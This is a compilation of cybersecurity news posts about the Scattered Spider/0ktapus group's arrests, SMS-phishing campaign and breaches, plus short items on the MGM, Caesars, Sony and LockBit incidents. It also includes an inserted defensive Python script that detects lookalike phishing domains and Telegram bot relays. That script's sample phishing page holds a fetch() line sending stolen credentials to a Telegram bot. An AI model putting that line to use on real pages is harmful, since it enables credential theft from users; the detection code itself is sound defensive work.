A 22-year-old man from the United Kingdom arrested this week in Spain is allegedly the ringleader of Scattered Spider, a cybercrime group suspected of hacking into Twilio, LastPass, DoorDash, Mailchimp, and nearly 130 other organizations over the past two years.

The Spanish daily Murcia Today reports the suspect was wanted by the FBI and arrested in Palma de Mallorca as he tried to board a flight to Italy.

A still frame from a video released by the Spanish national police shows Tylerb in custody at the airport.

“He stands accused of hacking into corporate accounts and stealing critical information, which allegedly enabled the group to access multi-million-dollar funds,” Murcia Today wrote. “According to Palma police, at one point he controlled Bitcoins worth $27 million.”

The cybercrime-focused Twitter/X account vx-underground said the U.K. man arrested was a SIM-swapper who went by the alias “Tyler.” In a SIM-swapping attack, crooks transfer the target’s phone number to a device they control and intercept any text messages or phone calls sent to the victim — including one-time passcodes for authentication, or password reset links sent via SMS.

“He is a known SIM-swapper and is allegedly involved with the infamous Scattered Spider group,” vx-underground wrote on June 15, referring to a prolific gang implicated in costly data ransom attacks at MGM and Caesars casinos in Las Vegas last year.

Sources familiar with the investigation told KrebsOnSecurity the accused is a 22-year-old from Dundee, Scotland named Tyler Buchanan, also allegedly known as “tylerb” on Telegram chat channels centered around SIM-swapping.

In January 2024, U.S. authorities arrested another alleged Scattered Spider member — 19-year-old Noah Michael Urban of Palm Coast, Fla. — and charged him with stealing at least $800,000 from five victims between August 2022 and March 2023. Urban allegedly went by the nicknames “Sosa” and “King Bob,” and is believed to be part of the same crew that hacked Twilio and a slew of other companies in 2022.

Investigators say Scattered Spider members are part of a more diffuse cybercriminal community online known as “The Com,” wherein hackers from different cliques boast loudly about high-profile cyber thefts that almost invariably begin with social engineering — tricking people over the phone, email or SMS into giving away credentials that allow remote access to corporate internal networks.

One of the more popular SIM-swapping channels on Telegram maintains a frequently updated leaderboard of the most accomplished SIM-swappers, indexed by their supposed conquests in stealing cryptocurrency. That leaderboard currently lists Sosa as #24 (out of 100), and Tylerb at #65.

0KTAPUS

In August 2022, KrebsOnSecurity wrote about peering inside the data harvested in a months-long cybercrime campaign by Scattered Spider involving countless SMS-based phishing attacks against employees at major corporations. The security firm Group-IB dubbed the gang by a different name — 0ktapus, a nod to how the criminal group phished employees for credentials.

The missives asked users to click a link and log in at a phishing page that mimicked their employer’s Okta authentication page. Those who submitted credentials were then prompted to provide the one-time password needed for multi-factor authentication.

These phishing attacks used newly-registered domains that often included the name of the targeted company, and sent text messages urging employees to click on links to these domains to view information about a pending change in their work schedule. The phishing sites also featured a hidden Telegram instant message bot to forward any submitted credentials in real-time, allowing the attackers to use the phished username, password and one-time code to log in as that employee at the real employer website.
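The lure infrastructure described above suggests two cheap checks a defender can run. The following Python script is an added example, not code from the KrebsOnSecurity article, from Group-IB, or from any of the campaigns discussed: it (1) scans a feed of newly registered domains for ones that pair a target company's name with an authentication or HR keyword, after undoing digit-for-letter swaps such as the "0" in 0ktapus, and (2) scans a phishing page's HTML for the Telegram Bot API call used to relay submitted credentials. The brand names, allowlist, keyword list, domain feed and page content are all constructed for the example and are not real registrations or a real campaign's page.

```python
"""Two detection checks for 0ktapus-style SMS phishing infrastructure.

1. find_lures(): flag newly registered domains that combine a target brand
   with an authentication/HR keyword (acme-sso.com, acme-schedule.com, ...),
   after undoing digit-for-letter swaps such as "0kta" for "okta".
2. telegram_exfil_indicators(): find a Telegram Bot API call embedded in a
   phishing page's HTML, the channel the campaign used to relay credentials.

All brands, domains and page content below are constructed for this example.
"""
import re
from datetime import date

# Assumed: the brands we defend and their genuine domains (constructed).
TARGET_BRANDS = ("acme", "twilio")
CORPORATE_ALLOWLIST = {"acme.com", "twilio.com"}
# Words the 2022 lures paired with the brand name (login portal, HR, schedule).
LURE_KEYWORDS = ("okta", "sso", "vpn", "login", "schedule", "hr", "mfa", "auth", "help")
# Digit-for-letter swaps that defeat naive substring matching on the brand.
LEET = str.maketrans({"0": "o", "1": "l", "3": "e", "4": "a", "5": "s", "7": "t"})


def registrable_part(domain: str) -> str:
    """Hostname without its public suffix, lowercased, labels joined by '-'.

    Toy suffix handling: drop the last label, or the last two for
    two-letter country suffixes such as co.uk. Use a public-suffix
    library in production.
    """
    labels = domain.lower().strip(".").split(".")
    if len(labels) >= 3 and len(labels[-1]) == 2 and labels[-2] in {"co", "com", "org", "net"}:
        labels = labels[:-2]
    else:
        labels = labels[:-1]
    return "-".join(labels)


def lure_indicators(domain: str) -> list:
    """Reasons a domain looks like a brand-impersonating credential lure ([] if none)."""
    if domain.lower() in CORPORATE_ALLOWLIST:
        return []
    raw = registrable_part(domain)
    name = raw.translate(LEET)  # "0kta-acme" -> "okta-acme"
    brands = [b for b in TARGET_BRANDS if b in name]
    if not brands:
        return []
    squashed = name.replace("-", "")  # so "acme-sso" still matches "sso"
    reasons = [f"brand:{b}" for b in brands]
    reasons += [f"keyword:{k}" for k in LURE_KEYWORDS if k in squashed]
    if name != raw:
        reasons.append("digit-substitution")
    return reasons


def find_lures(feed, today, max_age_days=14) -> list:
    """Scan (domain, registered_on) records; return recent suspects, strongest first."""
    hits = []
    for domain, registered_on in feed:
        if (today - registered_on).days > max_age_days:
            continue  # the campaign registered its domains days before sending lures
        reasons = lure_indicators(domain)
        if reasons:
            hits.append({"domain": domain, "registered_on": registered_on, "reasons": reasons})
    return sorted(hits, key=lambda h: (-len(h["reasons"]), h["domain"]))


# Bot API calls look like https://api.telegram.org/bot<id>:<secret>/sendMessage?chat_id=...
TG_BOT_RE = re.compile(r"api\.telegram\.org/bot(\d+):[A-Za-z0-9_-]+", re.I)
TG_CHAT_RE = re.compile(r"chat_id=(-?\d+)")


def telegram_exfil_indicators(html: str) -> list:
    """Bot and chat IDs of any Telegram relay in the page (the secret token is not returned)."""
    hits = []
    for m in TG_BOT_RE.finditer(html):
        chat = TG_CHAT_RE.search(html, m.end())
        hits.append({"bot_id": m.group(1), "chat_id": chat.group(1) if chat else None})
    return hits


# Constructed sample inputs (not real registrations or a real phishing page).
DEMO_TODAY = date(2022, 8, 3)
SAMPLE_FEED = [
    ("acme-sso.com", date(2022, 8, 1)),
    ("0kta-acme.net", date(2022, 8, 2)),
    ("acme-schedule.com", date(2022, 8, 3)),
    ("twilio-help.net", date(2022, 7, 30)),
    ("acme.com", date(1995, 1, 1)),              # genuine corporate domain, allowlisted
    ("bakery-acmeville.org", date(2019, 3, 3)),  # contains the brand but registered years ago
    ("weather.example", date(2022, 8, 3)),       # recent but no brand match
]
SAMPLE_PAGE = """
<form id="okta-login" action="/verify"><input name="u"><input name="p"></form>
<script>
  function send(u, p) {
    fetch("https://api.telegram.org/bot123456789:AAExampleTokenNotReal/sendMessage"
          + "?chat_id=-100987654321&text=" + encodeURIComponent(u + ":" + p));
  }
</script>
"""

if __name__ == "__main__":
    for hit in find_lures(SAMPLE_FEED, DEMO_TODAY):
        print(hit["domain"], hit["registered_on"], ", ".join(hit["reasons"]))
    print(telegram_exfil_indicators(SAMPLE_PAGE))
```

The domain check deliberately combines three weak signals (recent registration, brand name, auth keyword or digit swap) rather than any one of them, because each alone produces too many false positives; the allowlist has to be maintained, since a stale one will flag the company's own newly registered domains. The Telegram check returns only the bot and chat IDs, which are enough to pivot on, and never the secret token, so the output can be shared in a ticket without leaking a credential.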

One of Scattered Spider’s first big victims in its 2022 SMS phishing spree was Twilio, a company that provides services for making and receiving text messages and phone calls. The group then pivoted, using their access to Twilio to attack at least 163 of its customers.

A Scattered Spider phishing lure sent to Twilio employees.

Among those was the encrypted messaging app Signal, which said the breach could have let attackers re-register the phone number on another device for about 1,900 users.

Also in August 2022, several employees at email delivery firm Mailchimp provided their remote access credentials to this phishing group. According to Mailchimp, the attackers used their access to Mailchimp employee accounts to steal data from 214 customers involved in cryptocurrency and finance.

On August 25, 2022, the password manager service LastPass disclosed a breach in which attackers stole some source code and proprietary LastPass technical information, and weeks later LastPass said an investigation revealed no customer data or password vaults were accessed.

However, on November 30, 2022 LastPass disclosed a far more serious breach that the company said leveraged data stolen in the August breach. LastPass said criminal hackers had stolen encrypted copies of some password vaults, as well as other personal information.

In February 2023, LastPass disclosed that the intrusion involved a highly complex, targeted attack against an engineer who was one of only four LastPass employees with access to the corporate vault. In that incident, the attackers exploited a security vulnerability in a Plex media server that the employee was running on his home network, and succeeded in installing malicious software that stole passwords and other authentication credentials. The vulnerability exploited by the intruders was patched back in 2020, but the employee never updated his Plex software.

Plex announced its own data breach one day before LastPass disclosed its initial August intrusion. On August 24, 2022, Plex’s security team urged users to reset their passwords, saying an intruder had accessed customer emails, usernames and encrypted passwords.

TURF WARS

Sosa and Tylerb were both subjected to physical attacks from rival SIM-swapping gangs. These communities have been known to settle scores by turning to so-called “violence-as-a-service” offerings on cybercrime channels, wherein people can be hired to perform a variety of geographically-specific “in real life” jobs, such as bricking windows, slashing car tires, or even home invasions.

In 2022, a video surfaced on a popular cybercrime channel purporting to show attackers hurling a brick through a window at an address that matches the spacious and upscale home of Urban’s parents in Sanford, Fla.

January’s story on Sosa noted that a junior member of his crew named “Foreshadow” was kidnapped, beaten and held for ransom in September 2022. Foreshadow’s captors held guns to his bloodied head while forcing him to record a video message pleading with his crew to fork over a $200,000 ransom in exchange for his life (Foreshadow escaped further harm in that incident).

According to several SIM-swapping channels on Telegram that Tylerb was known to frequent, rival SIM-swappers hired thugs to invade his home in February 2023. Those accounts state that the intruders assaulted Tylerb’s mother in the home invasion, and that they threatened to burn him with a blowtorch if he didn’t give up the keys to his cryptocurrency wallets. Tylerb was reputed to have fled the United Kingdom after that assault.

KrebsOnSecurity sought comment from Mr. Buchanan, and will update this story in the event he responds.

A lawsuit has been filed against two prominent gaming companies for failing to safeguard their customers’ personally identifiable information, exposing them to a potential penalty that could run to millions of dollars. The legal action concerns MGM Resorts International and Caesars Entertainment, both of which fell victim to a file-encrypting malware attack toward the end of last week.

So far, two separate lawsuits have been filed over the MGM cyber-attack, while Caesars faces three, one of which was filed just last Friday.

The identity of the culprits behind both breaches has not been confirmed. However, the malware research collective vx-underground has alleged that ALPHV, also known as the BlackCat ransomware group, was involved and managed to exfiltrate a portion of the data from the compromised servers.

Collaborating closely, the Nevada Gaming Control Board and the FBI have launched an investigation into this cyber incident. Their findings are expected to be presented in a report due early next month.

MGM Resorts has since restored its systems after a 10-day shutdown. It remains unclear whether the company paid the attackers or relied on its business continuity plan to restore applications and data.

As for Caesars, the company has not yet issued an official statement regarding the matter.

In both incidents, the attackers obtained network login credentials through a vishing (voice phishing) attack against an unsuspecting employee. Businesses are therefore urged to adopt a comprehensive approach to cybersecurity, including awareness training for staff, since any organization can be targeted this way.

The post Lawsuit against MGM and Ceasars Entertainment Ransomware Attack appeared first on Cybersecurity Insiders.

Investigation Deepens into MGM Resorts Hack and Caesars Entertainment Ransomware Attack

Recent developments in the ongoing investigation into the MGM Resorts hack and the Caesars Entertainment ransomware attack have shed new light on the culprits behind these cybercrimes. Law enforcement agencies working on the case have indicated that the individuals responsible are likely between 17 and 22 years old, a finding consistent with research by Unit 42, the threat research division of Palo Alto Networks.

The sequence of events began with a deceptively simple phone call. The attackers persuaded senior staff members to divulge their login credentials, gaining unauthorized access to the corporate networks of both casino operators. The callers appeared to be young, possibly as young as 17, and were identified as native English speakers. The technique, known as vishing (voice phishing), manipulates the target over the phone rather than by e-mail or SMS.

As the Scattered Spider group, also known as UNC3944, breached the systems of two of the world’s largest gaming and casino corporations, concerns are mounting about the evolving sophistication of cyber threats in the future.

RANSOMEDVC Claims to Infiltrate Sony Corporation Computer Network

A ransomware group known as RANSOMEDVC claims to have infiltrated the computer networks of Sony Corporation with the aim of stealing sensitive information for later sale on the dark web.

Notably, RANSOMEDVC has not made a ransom demand to Sony. Instead, it intends to monetize the intrusion by selling the stolen data on the dark web.

To back its claim, the group has released an initial batch of stolen data, including PDFs and screenshots. It says the senior management of the Japanese conglomerate has shown no interest in negotiating over the breach, leaving it, by its own account, no option but to sell the data, which it believes could yield substantially more than any ransom payment.

Russian LockBit Ransomware Targets The Weather Network Servers

The Russian-speaking ransomware group LockBit has threatened to release data belonging to “The Weather Network” if its ransom demands are not met. The group has a long history of attacking corporate and government networks, but this is its first reported breach of a weather reporting organization. Further details are awaited as the situation unfolds.

The post Trending Ransomware News headlines on Google appeared first on Cybersecurity Insiders.

In recent weeks, Scattered Spider, a highly active hacking group, has made headlines by targeting more than 130 organizations, and the victim count is still rising. Epic Games, Riot Games, AT&T, HubSpot, TTEC, Best Buy, Evernote, Microsoft, Coinbase, KuCoin, Binance, Twitter, Slack, Verizon Wireless, MetroPCS, T-Mobile, and the now-defunct UK fashion brand Skin Trend have all been reported as victims.

The group’s most recent victim, MGM Resorts, is reportedly losing an estimated $6 million to $8 million a day, and those losses are expected to mount in the coming weeks.

According to a report from Mandiant, the attack on MGM, which relied heavily on social engineering, may cause further disruption to the company’s operations. IT teams are working to restore the network, with a target of roughly 15 days. In the meantime, the company is already facing a cash-flow shortfall of $1 million, and there are concerns that the crisis could erode the trust of its loyal customers.

Such incidents leave a lasting mark on customer perception, especially with the holiday season approaching. Some customers may opt for alternatives this year, such as online betting or travel to destinations with established casino industries like Dubai, Singapore, or Malaysia.

An MGM insider says the company used to enjoy $7 million in daily cash flow and $39 million in revenue. The outage has disrupted the entire gaming business, and the company is now heavily reliant on external investment for revenue.

Scattered Spider is tracked under different names by different organizations: 0ktapus by Group-IB, UNC3944 by Google-owned Mandiant, and Scatter Swine by Okta.

The post Scattered Spider managed MGM Resort Network Outage brings $8m loss daily appeared first on Cybersecurity Insiders.